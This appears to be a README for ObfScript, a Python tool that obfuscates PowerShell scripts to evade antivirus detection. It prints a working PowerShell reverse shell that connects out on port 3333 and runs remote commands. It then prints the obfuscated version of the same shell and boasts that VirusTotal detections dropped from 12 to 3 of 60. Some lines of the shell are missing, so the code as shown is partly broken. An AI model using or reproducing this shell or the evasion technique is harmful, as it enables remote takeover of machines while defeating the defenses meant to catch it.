ObfScript is a windows powershell script obfuscator with the goal of avoiding threat detection by antiviruses. I got the idea from this article: https://github.com/t3l3machus/PowerShell-Obfuscation-Bible
this program is only for educational purposes
this program is not tested on a large number of samples and in some cases it may break your scripts. but I'm trying to fix some issues
example of obfscript usage:
python obfscript.py --add-comment --negetropy 1 --change-value --size 2000 --input example/reverse_shell.ps1 --out example/reverse_shell.obf.ps1
specifies the input file
specifies the output file
specifies the size of output file in bytes
warning: the output file size is not accurate but it tries to get close to it as much as possible
adds random comment to output script
changes $True, $False and $null values to obfuscated form
the higher the negetropy the lower the antropy. example:
this is an obfuscted object name with size of 26 and n=1:
$HRoNRKOroehmDyvzqhbzyhCltU = "something"
now this this is an obfuscted object name with size of 26 and n=5:
this is a simple reverse shell in powershell script:
$socket = new-object System.Net.Sockets.TcpClient('', 3333);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$writer.Write("> ");
$read = $null;
while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
$out = $out.split(' ')
$res = [string](&$out[0] $out[1..$out.length]);
if($res -ne $null){ $writer.WriteLine($res)}
}While (!$out.equals("exit"))
let's scan it with virustotal
as you can see 12 out of 60 antiviruses could detect the malware
now let's use ObfScript to obfuscate it
python.exe obfscript.py --add-comment --negetropy 5 --change-value --size 2000 --input example/reverse_shell.ps1 --out example/reverse_shell.obf.ps1
this is the obfuscated output we got:
$VVVVVUUUUUTTTTTIIIIIeeeeeC = new-object System.Net.Sockets.TcpClient('', 3333)<#WWWWWIIIIIEEEEE#>
if($VVVVVUUUUUTTTTTIIIIIeeeeeC -eq $(171 -as [System.DBNull])){exit 1}<#TTTTTGGGGGrrrrr#>
$TTTTTWWWWWFFFFFvvvvvgggggN = $VVVVVUUUUUTTTTTIIIIIeeeeeC.GetStream()<#jjjjjoooooccccc#>
$uuuuurrrrrGGGGGNNNNNPPPPPY = new-object System.IO.StreamWriter($TTTTTWWWWWFFFFFvvvvvgggggN)<#MMMMMdddddLLLLL#>
$lllllhhhhhkkkkkaaaaabbbbbv = new-object System.Byte[] 1024<#RRRRRWWWWWhhhhh#>
$oooooPPPPPQQQQQnnnnnvvvvvY = new-object System.Text.AsciiEncoding<#iiiiieeeeeTTTTT#>
$uuuuurrrrrGGGGGNNNNNPPPPPY.Write("> ")<#lllllIIIIIXXXXX#>
$OOOOOuuuuuwwwwwoooooFFFFFS = $(29 -as [void])<#zzzzzgggggQQQQQ#>
while($TTTTTWWWWWFFFFFvvvvvgggggN.DataAvailable -or ($OOOOOuuuuuwwwwwoooooFFFFFS = $TTTTTWWWWWFFFFFvvvvvgggggN.Read($lllllhhhhhkkkkkaaaaabbbbbv, 0, 1024)) -eq $(function YNTBgmPDj {})){} <#KKKKKrrrrrKKKKK#>
$YYYYYXXXXXLLLLLTTTTTuuuuud = $oooooPPPPPQQQQQnnnnnvvvvvY.GetString($lllllhhhhhkkkkkaaaaabbbbbv, 0, $OOOOOuuuuuwwwwwoooooFFFFFS).Replace("`r`n","").Replace("`n","")<#kkkkkIIIIIEEEEE#>
if($tttttNNNNNooooorrrrrBBBBBY -ne $(138 -as [System.DBNull])){ $uuuuurrrrrGGGGGNNNNNPPPPPY.WriteLine($tttttNNNNNooooorrrrrBBBBBY)}<#cccccdddddlllll#>
}While (!$YYYYYXXXXXLLLLLTTTTTuuuuud.equals("exit"))<#kkkkkPPPPPNNNNN#>
let's scan it again with virustotal
now only 3 out of 60 antiviruses could detect our malware
If you found this useful and would like to support, you can send donations to this XMR address: 43EfpCz23b5WPgzaw6UVnF9KsbvueFUumTuk3yMJ8acQbPPFoxgHfq6LE2qD8gNfR3j6Fzc4oGvXRCHvvfmdsYEvPtUXK2v